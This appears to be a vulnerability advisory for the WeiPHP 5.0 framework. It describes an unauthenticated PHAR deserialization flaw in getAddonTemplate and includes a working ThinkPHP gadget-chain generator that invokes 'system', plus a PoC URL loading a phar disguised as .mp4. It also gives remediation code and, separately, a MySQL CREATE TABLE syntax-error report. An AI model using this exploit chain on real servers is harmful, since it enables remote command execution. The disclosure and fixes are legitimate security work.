weiphpdev / weiphp5.0

WeiPHP 5.0: the best development framework for combining official accounts and mini programs. One backend manages and operates multiple clients at the same time (WeChat official accounts and WeChat mini programs, with Alipay mini programs, Baidu mini programs and others to follow).

License: Other
vendor: https://github.com/weiphpdev/weiphp5.0
version: 5.0
php version: 7.x
A PHAR deserialization vulnerability is identified in WeiPHP 5.0 in the getAddonTemplate function. The flaw allows an attacker to supply an arbitrary phar:// path in the templateFile parameter, which forces the application to deserialize the archive's metadata during the file_exists check. Notably, the vulnerability can be triggered without any form of authentication.

The implications of this vulnerability include:

The vulnerability stems from the lack of validation of the input parameter in the getAddonTemplate function. The parameter is passed directly to file_exists, which triggers PHAR deserialization and may also reach other PHP stream wrappers. The class is registered as BaseController and its functions are public, so every controller that inherits from it can invoke the method, which widens the exposure of this vulnerability.
file path: application/common/controller/Base.php

```php
public function getAddonTemplate($templateFile = '')
{
    // Vulnerable: the raw, user-controlled $templateFile reaches file_exists() here.
    if (file_exists($templateFile)) {
        return $templateFile;
    }
    if (empty($templateFile)) {
        $path = env('app_path') . parse_name(MODULE_NAME) . '/view/' . parse_name(CONTROLLER_NAME) . '/' . ACTION_NAME . '.html';
        $new_path = env('app_path') . '/common/view/base/' . ACTION_NAME . '.html';
        if (file_exists($path)) {
            $templateFile = $path;
        } elseif (file_exists($new_path)) {
            $templateFile = 'common@base/' . ACTION_NAME;
        }
    } elseif (stripos($templateFile, '@') === false && stripos($templateFile, '/') === false) {
        // e.g. "index"
        $path = env('app_path') . parse_name(MODULE_NAME) . '/view/' . parse_name(CONTROLLER_NAME) . '/' . $templateFile . '.html';
        $new_path = env('app_path') . '/common/view/base/' . $templateFile . '.html';
        if (!file_exists($path) && file_exists($new_path)) {
            $templateFile = 'common@base/' . $templateFile;
        }
    }
    return $templateFile;
}
```
Use the following code to generate the PHAR archive containing the malicious data (the file is then uploaded with an .mp4 extension):

```php
<?php
namespace think;

abstract class Model
{
    protected $append = [];
    private $data = [];

    public function __construct()
    {
        $this->append = ["li" => []];
        $this->data = ["li" => new Request()];
    }
}

namespace think\process\pipes;

use think\model\Pivot;

class Windows
{
    private $files = [];

    public function __construct()
    {
        $this->files = [new Pivot()];
    }
}

namespace think\model;

use think\model;

class Pivot extends Model
{
}

namespace think;

class Request
{
    protected $hook = [];
    protected $filter;
    protected $config;
    protected $param = [];

    public function __construct()
    {
        $this->hook = ["visible" => [$this, "isAjax"]];
        $this->filter = 'system';
        $this->config = ["var_ajax" => '']; // Attach a value to this key name
        $this->param = ['dir'];
    }
}

use think\process\pipes\Windows;

$phar = new \Phar('exploit.phar');
$phar->startBuffering();
$phar->addFromString('exploit.txt', 'This is an exploit file.');
$phar->setStub('<?php __HALT_COMPILER(); ?>');
$phar->setMetadata(new Windows());
$phar->stopBuffering();
```
Then upload it in the location shown below
PoC:
http://127.0.0.1/index.php/draw/api/getAddonTemplate?templateFile=phar://uploads/download/20240322/65fcf450e90f2.mp4
First, user authentication should be required on this interface, and uploaded files should go through strict validation. Second, the incoming template name should be checked so that its prefix (scheme and directory) is not attacker-controllable and only the trailing name component is.
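As an added example (not WeiPHP's own code) of the two remediation points above, the PHP below implements an upload gate that validates file content rather than the client-supplied name, and a template resolver in which the caller controls only a bare template name, never the scheme or the directory. The class and function names, the view-directory layout and the allowed upload types are assumptions for the demonstration; the block also unregisters the phar stream wrapper at bootstrap as defence in depth.

```php
<?php
// Added example, not code from the WeiPHP project. All paths, the allowed upload
// types and the class/function names are assumptions for the demonstration.
declare(strict_types=1);

/**
 * Upload gate: returns null when the file is accepted, otherwise a reason.
 * Only allow-listed extensions pass, and the content must start with the
 * signature expected for that type. A PHAR stub must contain "__HALT_COMPILER",
 * so its presence is rejected outright; compressed or tar/zip-based archives can
 * hide that marker, so this is a supplement to the resolver below, not a substitute.
 */
function uploadRejectReason(string $tmpPath, string $clientName): ?string
{
    $signatures = ['jpg' => "\xFF\xD8\xFF", 'jpeg' => "\xFF\xD8\xFF", 'png' => "\x89PNG"];
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!isset($signatures[$ext])) {
        return "extension '$ext' is not in the allow-list";
    }
    $data = (string) file_get_contents($tmpPath);
    if (strncmp($data, $signatures[$ext], strlen($signatures[$ext])) !== 0) {
        return "content does not match a .$ext file";
    }
    if (stripos($data, '__HALT_COMPILER') !== false) {
        return 'content carries a PHAR stub';
    }
    return null;
}

/**
 * Template resolver: accepts only an identifier such as "index", builds the path
 * itself, and confirms with realpath() that the result lies inside the configured
 * view directory. No user-controlled string reaches file_exists() or realpath()
 * as a path of its own.
 */
final class TemplateResolver
{
    /** @var string canonical view directory (assumed to stand in for the module view path) */
    private $viewRoot;

    public function __construct(string $viewRoot)
    {
        $real = realpath($viewRoot);
        if ($real === false) {
            throw new InvalidArgumentException("view root not found: $viewRoot");
        }
        $this->viewRoot = $real;
    }

    public function resolve(string $templateFile): ?string
    {
        // No scheme ("phar://"), no "/", no "@" and no "." can pass this pattern.
        if (preg_match('/\A[A-Za-z0-9_]{1,64}\z/', $templateFile) !== 1) {
            return null;
        }
        $real = realpath($this->viewRoot . DIRECTORY_SEPARATOR . $templateFile . '.html');
        $prefix = $this->viewRoot . DIRECTORY_SEPARATOR;
        if ($real === false || strncmp($real, $prefix, strlen($prefix)) !== 0) {
            return null;
        }
        return $real;
    }
}

// Defence in depth for the bootstrap file: if the application never reads .phar
// archives at runtime, removing the wrapper stops "phar://" paths from being opened
// (and so from unserialising metadata) in every filesystem function.
if (in_array('phar', stream_get_wrappers(), true)) {
    stream_wrapper_unregister('phar');
}

// Demonstration on a constructed temporary view directory and constructed uploads.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'wp_demo_' . bin2hex(random_bytes(4));
mkdir($root, 0700);
file_put_contents("$root/index.html", '<p>demo</p>');
file_put_contents("$root/real.png", "\x89PNG\r\n\x1a\n");
file_put_contents("$root/fake.png", "<?php __HALT_COMPILER(); ?>");
file_put_contents("$root/poly.png", "\x89PNG\r\n\x1a\n<?php __HALT_COMPILER(); ?>");

$resolver = new TemplateResolver($root);
foreach (['index', 'phar://uploads/download/x.mp4', '../base/index', 'missing'] as $name) {
    printf("%-32s => %s\n", $name, $resolver->resolve($name) ?? 'rejected');
}

$uploads = [
    'real.png'    => "$root/real.png",
    'fake.png'    => "$root/fake.png",
    'poly.png'    => "$root/poly.png",
    'payload.mp4' => "$root/fake.png", // extension is rejected before content is read
];
foreach ($uploads as $clientName => $tmp) {
    printf("%-32s => %s\n", $clientName, uploadRejectReason($tmp, $clientName) ?? 'accepted');
}

array_map('unlink', glob("$root/*"));
rmdir($root);
```

The resolver is deliberately stricter than getAddonTemplate: it drops the `module@view/action` and slash forms the original accepts. If those forms are needed, each component should be matched against the same identifier pattern and joined by the code, never taken as a raw path. The marker check in the upload gate only catches an uncompressed stub, which is why the resolver and the wrapper removal, not the upload check, are the primary controls.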
A separate report on the same page: a MySQL syntax error raised while creating the wp_shop_order table. The exception page reports:

| Field | Value |
|---|---|
| SQLSTATE | 42000 |
| Driver Error Code | 1064 |
| Driver Error Message | You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '(0) NULL DEFAULT CURRENT_TIMESTAMP(0) COMMENT '更新时间', notice_erp in' at line 63 |

Code context shown on the exception page (an excerpt from the database connection's execute() method; the page shows only this fragment):

```php
    $this->numRows = $this->PDOStatement->rowCount();
    return $this->numRows;
} catch (\PDOException $e) {
    if ($this->isBreak($e)) {
        return $this->close()->execute($sql, $bind, $query);
    }
    throw new PDOException($e, $this->config, $this->getLastsql());
} catch (\Throwable $e) {
    if ($this->isBreak($e)) {
        return $this->close()->execute($sql, $bind, $query);
    }
    throw $e;
} catch (\Exception $e) {
    if ($this->isBreak($e)) {
        return $this->close()->execute($sql, $bind, $query);
    }
    // excerpt ends here
```

Error SQL (the statement reassembled from the flattened dump). The parser stops at the `timestamp(0) NULL DEFAULT CURRENT_TIMESTAMP(0)` definition of the update_at column; the fractional-seconds precision syntax used there requires MySQL 5.6.4 or later.

```sql
CREATE TABLE wp_shop_order (
  id int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT '主键',
  goods_datas text CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL COMMENT '商品序列化数据',
  uid int(10) UNSIGNED NOT NULL COMMENT '用户id',
  remark text CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL COMMENT '备注',
  order_number varchar(255) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL COMMENT '订单编号',
  cTime int(10) NOT NULL COMMENT '订单时间',
  total_price decimal(10, 2) NULL DEFAULT NULL COMMENT '总价',
  openid varchar(255) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL COMMENT 'OpenID',
  pay_status int(10) NULL DEFAULT NULL COMMENT '支付状态',
  pay_type tinyint(2) NULL DEFAULT 0 COMMENT '支付类型',
  address_id int(10) NULL DEFAULT NULL COMMENT '配送信息',
  is_send int(10) NULL DEFAULT 0 COMMENT '是否发货',
  send_code varchar(255) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL COMMENT '快递公司编号',
  send_number varchar(255) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL COMMENT '快递单号',
  send_type char(10) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL COMMENT '发货类型',
  is_new tinyint(2) NULL DEFAULT 1 COMMENT '是否为新订单',
  wpid int(10) NULL DEFAULT NULL COMMENT 'wpid',
  status_code char(50) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT '0' COMMENT '订单跟踪状态码',
  event_type tinyint(2) NULL DEFAULT 0 COMMENT '订单来源',
  is_lock int(10) NULL DEFAULT 1 COMMENT '数量是否锁定',
  erp_lock_code text CHARACTER SET utf8 COLLATE utf8_general_ci NULL COMMENT 'ERP锁定商品编号',
  mail_money float NULL DEFAULT 0 COMMENT '邮费金额',
  stores_id int(10) NULL DEFAULT NULL COMMENT '门店编号',
  pay_time int(10) NULL DEFAULT NULL COMMENT '支付时间',
  send_time int(10) NULL DEFAULT NULL COMMENT '发货时间',
  extra text CHARACTER SET utf8 COLLATE utf8_general_ci NULL COMMENT '扩展参数',
  order_state int(10) NULL DEFAULT 1 COMMENT '订单状态',
  out_trade_no varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL COMMENT '支付的订单号',
  event_id int(10) NULL DEFAULT NULL COMMENT '活动ID',
  is_original tinyint(2) NULL DEFAULT 0 COMMENT '活动中是否原价购买',
  update_at timestamp(0) NULL DEFAULT CURRENT_TIMESTAMP(0) COMMENT '更新时间',
  notice_erp int(11) NULL DEFAULT 0 COMMENT '为0时不需要推送,大于0时需要推送',
  refund tinyint(1) NULL DEFAULT 0 COMMENT '退款状态',
  refund_content varchar(255) CHARACTER SET utf8 COLLATE utf8_general_ci NULL DEFAULT NULL COMMENT '退款原因',
  pay_money decimal(10, 2) NULL DEFAULT NULL COMMENT '实付价格',
  dec_money decimal(10, 2) NULL DEFAULT NULL COMMENT '优惠价格',
  PRIMARY KEY (id) USING BTREE
) ENGINE = InnoDB AUTO_INCREMENT = 1 CHARACTER SET = utf8 COLLATE = utf8_general_ci ROW_FORMAT = Compact
```